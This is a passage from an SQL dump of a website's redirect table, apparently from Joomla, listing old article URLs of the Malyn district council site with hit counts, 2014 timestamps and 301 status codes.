00:00:00',301),(1737,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51&Itemid=92&lang=uk','','','',15,0,'2014-09-17 21:59:11','0000-00-00 00:00:00',301),(1738,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&Itemid=14&lang=ru','','','',11,0,'2014-09-17 21:59:29','0000-00-00 00:00:00',301),(1739,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-----l---r--------------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-09-17 22:01:04','0000-00-00 00:00:00',301),(1740,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-09-17 22:01:12','0000-00-00 00:00:00',301),(1741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&Itemid=98&lang=uk','','','',2,0,'2014-09-17 22:05:36','0000-00-00 00:00:00',301),(1742,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=57:--15042014-&Itemid=98&lang=en','','','',3,0,'2014-09-17 22:05:37','0000-00-00 00:00:00',301),(1743,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&Itemid=97&lang=en','','','',2,0,'2014-09-17 22:05:38','0000-00-00 00:00:00',301),(1744,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&Itemid=97&lang=ru','','','',3,0,'2014-09-17 22:05:39','0000-00-00 00:00:00',301),(1745,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56&Itemid=97&lang=uk','','','',11,0,'2014-09-17 22:05:40','0000-00-00 00:00:00',301),(1746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-17 22:05:41','0000-00-00 00:00:00',301),(1747,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-17 22:05:41','0000-00-00 00:00:00',301),(1748,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=6&lang=ru','','','',29,0,'2014-09-17 22:05:51','0000-00-00 00:00:00',301),(1749,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51:--19072013-&Itemid=92&lang=en','','','',16,0,'2014-09-17 22:05:57','0000-00-00 00:00:00',301),(1750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51:--19072013-&Itemid=92&lang=uk','','','',9,0,'2014-09-17 22:06:00','0000-00-00 00:00:00',301),(1751,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&Itemid=92&lang=en','','','',2,0,'2014-09-17 22:06:03','0000-00-00 00:00:00',301),(1752,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=ru','','','',5,0,'2014-09-17 22:06:10','0000-00-00 00:00:00',301),(1753,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&Itemid=14&lang=uk','','','',14,0,'2014-09-17 22:06:59','0000-00-00 00:00:00',301),(1754,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54&Itemid=95&lang=en','','','',9,0,'2014-09-17 22:10:10','0000-00-00 00:00:00',301),(1755,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=uk','','','',5,0,'2014-09-17 22:10:18','0000-00-00 00:00:00',301),(1756,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',19,0,'2014-09-17 22:10:19','0000-00-00 00:00:00',301),(1757,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-17 22:10:20','0000-00-00 00:00:00',301),(1758,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=uk&Itemid=','','','',8,0,'2014-09-17 22:11:05','0000-00-00 00:00:00',301),(1759,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11&Itemid=14&lang=ru','','','',16,0,'2014-09-17 22:11:06','0000-00-00 00:00:00',301),(1760,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47&Itemid=86&lang=uk','','','',5,0,'2014-09-17 22:12:13','0000-00-00 00:00:00',301),(1761,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:---------------lr---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-17 22:13:24','0000-00-00 00:00:00',301),(1762,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-17 22:13:33','0000-00-00 00:00:00',301),(1763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=en','','','',1,0,'2014-09-17 22:15:57','0000-00-00 00:00:00',301),(1764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=en&Itemid=','','','',9,0,'2014-09-17 22:16:07','0000-00-00 00:00:00',301),(1765,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-17 22:16:56','0000-00-00 00:00:00',301),(1766,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47:-21022013-&Itemid=86&lang=en','','','',20,0,'2014-09-17 22:18:27','0000-00-00 00:00:00',301),(1767,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-17 22:20:17','0000-00-00 00:00:00',301),(1768,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=uk','','','',5,0,'2014-09-17 22:21:03','0000-00-00 00:00:00',301),(1769,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',25,0,'2014-09-17 22:22:27','0000-00-00 00:00:00',301),(1770,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=ru','','','',5,0,'2014-09-17 22:23:38','0000-00-00 00:00:00',301),(1771,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-17 22:25:21','0000-00-00 00:00:00',301),(1772,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47:-21022013-&Itemid=86&lang=uk','','','',8,0,'2014-09-17 22:27:21','0000-00-00 00:00:00',301),(1773,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:----------------------2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-17 22:28:23','0000-00-00 00:00:00',301),(1774,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=49:--12042013-&Itemid=88&lang=en','','','',6,0,'2014-09-17 22:29:01','0000-00-00 00:00:00',301),(1775,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=36&Itemid=70&lang=ru','','','',7,0,'2014-09-17 22:30:34','0000-00-00 00:00:00',301),(1776,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=uk','','','',19,0,'2014-09-17 22:30:38','0000-00-00 00:00:00',301),(1777,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47:--21022013-&Itemid=86&lang=en','','','',5,0,'2014-09-17 22:31:06','0000-00-00 00:00:00',301),(1778,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=en','','','',10,0,'2014-09-17 22:32:39','0000-00-00 00:00:00',301),(1779,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',13,0,'2014-09-17 22:33:13','0000-00-00 00:00:00',301),(1780,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=uk&Itemid=','','','',1,0,'2014-09-17 22:34:00','0000-00-00 00:00:00',301),(1781,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-17 22:35:21','0000-00-00 00:00:00',301),(1782,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',4,0,'2014-09-17 22:36:16','0000-00-00 00:00:00',301),(1783,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-17 22:37:01','0000-00-00 00:00:00',301),(1784,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52&Itemid=93&lang=en','','','',4,0,'2014-09-17 22:37:54','0000-00-00 00:00:00',301),(1785,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=uk','','','',8,0,'2014-09-17 22:38:01','0000-00-00 00:00:00',301),(1786,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-17 22:39:19','0000-00-00 00:00:00',301),(1787,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:---------------l-r&catid=36&Itemid=70&lang=en','','','',1,0,'2014-09-17 22:39:33','0000-00-00 00:00:00',301),(1788,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-2012-&catid=46:--21122012&Itemid=85&lang=en','','','',4,0,'2014-09-17 22:39:58','0000-00-00 00:00:00',301),(1789,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-17 22:43:31','0000-00-00 00:00:00',301),(1790,'http://www.malyn-rayrada.org.ua/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743','','','',1,0,'2014-09-17 22:45:19','0000-00-00 00:00:00',301),(1791,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-17 22:46:20','0000-00-00 00:00:00',301),(1792,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-17 22:48:52','0000-00-00 00:00:00',301),(1793,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47&Itemid=86&lang=ru','','','',9,0,'2014-09-17 22:48:55','0000-00-00 00:00:00',301),(1794,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-17 22:49:14','0000-00-00 00:00:00',301),(1795,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&Itemid=14&lang=ru','','','',10,0,'2014-09-17 22:50:44','0000-00-00 00:00:00',301),(1796,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',15,0,'2014-09-17 22:51:00','0000-00-00 00:00:00',301),(1797,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-17 22:51:04','0000-00-00 00:00:00',301),(1798,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',11,0,'2014-09-17 22:51:07','0000-00-00 00:00:00',301),(1799,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33&Itemid=66&lang=uk','','','',14,0,'2014-09-17 22:51:45','0000-00-00 00:00:00',301),(1800,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-17 22:51:49','0000-00-00 00:00:00',301),(1801,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',16,0,'2014-09-17 22:52:38','0000-00-00 00:00:00',301),(1802,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=32&lang=ru','','','',6,0,'2014-09-17 22:52:40','0000-00-00 00:00:00',301),(1803,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-17 22:54:00','0000-00-00 00:00:00',301),(1804,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1014:2013-06-03-06-43-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-17 22:54:27','0000-00-00 00:00:00',301),(1805,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',29,0,'2014-09-17 22:55:07','0000-00-00 00:00:00',301),(1806,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47&Itemid=86&lang=ru','','','',8,0,'2014-09-17 22:55:09','0000-00-00 00:00:00',301),(1807,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-17 22:55:28','0000-00-00 00:00:00',301),(1808,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-17 22:55:35','0000-00-00 00:00:00',301),(1809,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60:--11072014-&Itemid=108&lang=uk','','','',15,0,'2014-09-17 22:55:44','0000-00-00 00:00:00',301),(1810,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51&Itemid=92&lang=ru','','','',11,0,'2014-09-17 22:56:10','0000-00-00 00:00:00',301),(1811,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-17 22:58:16','0000-00-00 00:00:00',301),(1812,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=49:--12042013-&Itemid=88&lang=uk','','','',12,0,'2014-09-17 23:02:14','0000-00-00 00:00:00',301),(1813,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51&Itemid=92&lang=en','','','',7,0,'2014-09-17 23:03:39','0000-00-00 00:00:00',301),(1814,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-17 23:04:32','0000-00-00 00:00:00',301),(1815,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=ru','','','',5,0,'2014-09-17 23:09:16','0000-00-00 00:00:00',301),(1816,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-09-17 23:09:37','0000-00-00 00:00:00',301),(1817,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&Itemid=14&lang=en','','','',11,0,'2014-09-17 23:10:40','0000-00-00 00:00:00',301),(1818,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=uk','','','',3,0,'2014-09-17 23:11:30','0000-00-00 00:00:00',301),(1819,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=uk','','','',1,0,'2014-09-17 23:14:24','0000-00-00 00:00:00',301),(1820,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47:-21022013-&Itemid=86&lang=ru','','','',19,0,'2014-09-17 23:14:58','0000-00-00 00:00:00',301),(1821,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47&Itemid=86&lang=en','','','',12,0,'2014-09-17 23:16:15','0000-00-00 00:00:00',301),(1822,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-17 23:18:23','0000-00-00 00:00:00',301),(1823,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&lang=ru','','','',1,0,'2014-09-17 23:20:12','0000-00-00 00:00:00',301),(1824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-17 23:20:47','0000-00-00 00:00:00',301),(1825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=ru','','','',5,0,'2014-09-17 23:21:09','0000-00-00 00:00:00',301),(1826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-17 23:21:39','0000-00-00 00:00:00',301),(1827,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=53&Itemid=94&lang=uk','','','',6,0,'2014-09-17 23:23:41','0000-00-00 00:00:00',301),(1828,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-09-17 23:28:09','0000-00-00 00:00:00',301),(1829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-----------------2007-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-17 23:29:40','0000-00-00 00:00:00',301),(1830,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49&Itemid=88&lang=uk','','','',9,0,'2014-09-17 23:32:31','0000-00-00 00:00:00',301),(1831,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54&Itemid=95&lang=en','','','',2,0,'2014-09-17 23:33:44','0000-00-00 00:00:00',301),(1832,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49&Itemid=88&lang=en','','','',7,0,'2014-09-17 23:36:31','0000-00-00 00:00:00',301),(1833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47&Itemid=86&lang=ru','','','',5,0,'2014-09-17 23:38:15','0000-00-00 00:00:00',301),(1834,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49&Itemid=88&lang=en','','','',14,0,'2014-09-17 23:42:04','0000-00-00 00:00:00',301),(1835,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=49&Itemid=88&lang=en','','','',5,0,'2014-09-17 23:42:05','0000-00-00 00:00:00',301),(1836,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',16,0,'2014-09-17 23:42:51','0000-00-00 00:00:00',301),(1837,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-17 23:43:46','0000-00-00 00:00:00',301),(1838,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:---------------lr---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2014-09-17 23:43:59','0000-00-00 00:00:00',301),(1839,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51&Itemid=92&lang=en','','','',7,0,'2014-09-17 23:46:01','0000-00-00 00:00:00',301),(1840,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-17 23:46:28','0000-00-00 00:00:00',301),(1841,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-17 23:46:55','0000-00-00 00:00:00',301),(1842,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-17 23:46:57','0000-00-00 00:00:00',301),(1843,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=uk','','','',9,0,'2014-09-17 23:47:25','0000-00-00 00:00:00',301),(1844,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',7,0,'2014-09-17 23:47:26','0000-00-00 00:00:00',301),(1845,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57&Itemid=98&lang=uk','','','',10,0,'2014-09-17 23:48:44','0000-00-00 00:00:00',301),(1846,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-----&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-17 23:50:14','0000-00-00 00:00:00',301),(1847,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51:--19072013-&Itemid=92&lang=en','','','',8,0,'2014-09-17 23:51:30','0000-00-00 00:00:00',301),(1848,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=ru','','','',3,0,'2014-09-17 23:52:10','0000-00-00 00:00:00',301),(1849,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-17 23:52:42','0000-00-00 00:00:00',301),(1850,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-17 23:54:49','0000-00-00 00:00:00',301),(1851,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&Itemid=14&lang=uk','','','',19,0,'2014-09-17 23:54:57','0000-00-00 00:00:00',301),(1852,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-17 23:55:29','0000-00-00 00:00:00',301),(1853,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=en','','','',5,0,'2014-09-17 23:56:20','0000-00-00 00:00:00',301),(1854,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56&Itemid=97&lang=en','','','',12,0,'2014-09-18 00:02:45','0000-00-00 00:00:00',301),(1855,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:------qq&catid=15&lang=en&Itemid=','','','',4,0,'2014-09-18 00:02:52','0000-00-00 00:00:00',301),(1856,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',21,0,'2014-09-18 00:06:52','0000-00-00 00:00:00',301),(1857,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1219:-2004-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',5,0,'2014-09-18 00:07:35','0000-00-00 00:00:00',301),(1858,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=36&Itemid=70&lang=en','','','',5,0,'2014-09-18 00:09:14','0000-00-00 00:00:00',301),(1859,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-18 00:11:16','0000-00-00 00:00:00',301),(1860,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-18 00:13:20','0000-00-00 00:00:00',301),(1861,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',27,0,'2014-09-18 00:16:28','0000-00-00 00:00:00',301),(1862,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-18 00:21:27','0000-00-00 00:00:00',301),(1863,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=47&Itemid=86&lang=en','','','',2,0,'2014-09-18 00:23:37','0000-00-00 00:00:00',301),(1864,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47:-21022013-&Itemid=86&lang=uk','','','',4,0,'2014-09-18 00:23:54','0000-00-00 00:00:00',301),(1865,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47&Itemid=86&lang=uk','','','',4,0,'2014-09-18 00:25:15','0000-00-00 00:00:00',301),(1866,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',11,0,'2014-09-18 00:25:19','0000-00-00 00:00:00',301),(1867,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-18 00:26:57','0000-00-00 00:00:00',301),(1868,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-18 00:27:41','0000-00-00 00:00:00',301),(1869,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=32&lang=ru','','','',17,0,'2014-09-18 00:31:06','0000-00-00 00:00:00',301),(1870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-18 00:36:18','0000-00-00 00:00:00',301),(1871,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57:--15042014-&Itemid=98&lang=en','','','',11,0,'2014-09-18 00:36:50','0000-00-00 00:00:00',301),(1872,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-18 00:39:08','0000-00-00 00:00:00',301),(1873,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10&Itemid=17&lang=uk','','','',9,0,'2014-09-18 00:45:26','0000-00-00 